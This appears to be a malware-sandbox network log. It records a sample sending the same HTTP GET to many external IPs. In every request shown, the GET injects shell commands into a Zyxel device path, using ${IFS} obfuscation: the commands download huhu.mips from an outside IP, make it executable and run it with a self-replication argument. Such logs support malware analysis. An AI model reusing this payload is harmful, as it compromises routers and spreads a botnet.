                                                  Jan 19, 2024 18:23:55.033364058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4135192.168.2.1356206132.191.115.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033404112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4136192.168.2.135906468.103.217.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033458948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4137192.168.2.1355012186.198.98.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033505917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4138192.168.2.135130246.7.85.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033548117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4139192.168.2.1358738164.2.227.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033571005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4140192.168.2.1335880158.5.237.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033622980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4141192.168.2.1338580142.80.140.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033648014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4142192.168.2.1333466180.227.44.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033669949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4143192.168.2.1359270166.242.15.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033701897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4144192.168.2.1360922222.203.66.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033746004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4145192.168.2.13496628.207.243.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033803940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4146192.168.2.1359710206.173.130.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033859968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4147192.168.2.134882059.61.40.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033910036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4148192.168.2.133623636.191.69.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033940077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4149192.168.2.134954463.141.137.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.033974886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4150192.168.2.1348112149.174.43.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034034967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4151192.168.2.133690665.199.26.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034073114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4152192.168.2.1344568177.215.37.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034115076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4153192.168.2.1350820153.191.120.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034148932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4154192.168.2.1357374106.148.100.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034216881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4155192.168.2.134774838.129.191.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034246922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4156192.168.2.1349552170.215.60.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034275055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4157192.168.2.1335132153.76.75.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034341097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4158192.168.2.135144286.206.176.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034374952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4159192.168.2.1357440111.220.177.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034401894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4160192.168.2.133844247.50.120.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034459114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4161192.168.2.135157876.50.134.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034491062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4162192.168.2.1344290107.13.87.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034554005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4163192.168.2.1352526133.11.71.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034584045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4164192.168.2.1354914204.38.13.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034619093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4165192.168.2.135239886.118.123.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034689903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4166192.168.2.134754253.180.186.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034702063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4167192.168.2.1345388135.11.76.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034734011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4168192.168.2.133655272.120.152.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034775972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4169192.168.2.133377285.192.53.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034821987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4170192.168.2.134064437.1.194.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034852982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4171192.168.2.1351210200.255.24.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034925938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4172192.168.2.1351186164.90.238.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034950972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4173192.168.2.1345596220.213.17.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.034986973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4174192.168.2.13545348.175.55.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035022020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4175192.168.2.1357508204.24.61.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035070896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4176192.168.2.1350946192.229.22.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035115957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4177192.168.2.1355782135.82.114.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035145998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4178192.168.2.1354090221.25.13.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035181999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4179192.168.2.135775672.242.224.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035239935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4180192.168.2.1342582110.152.33.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035274982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4181192.168.2.135229083.66.34.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035326958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4182192.168.2.134124499.90.12.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035362959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4183192.168.2.1359886210.226.254.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035406113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4184192.168.2.1346074218.182.227.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035459995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4185192.168.2.1354676166.89.98.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035496950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4186192.168.2.133645286.0.200.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035545111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4187192.168.2.135178486.190.24.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035578012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4188192.168.2.1340192114.147.85.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035614967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4189192.168.2.1341650181.79.77.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035661936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4190192.168.2.135204497.239.156.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035706997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4191192.168.2.133408613.239.93.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035744905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4192192.168.2.1335344223.130.56.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035803080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4193192.168.2.1341036209.38.6.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035836935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4194192.168.2.135313634.26.236.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035883904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4195192.168.2.1341876198.127.100.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035933971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4196192.168.2.135210631.47.34.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:55.035986900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4197192.168.2.1333702126.6.116.199443
                                                  TimestampBytes transferredDirectionData
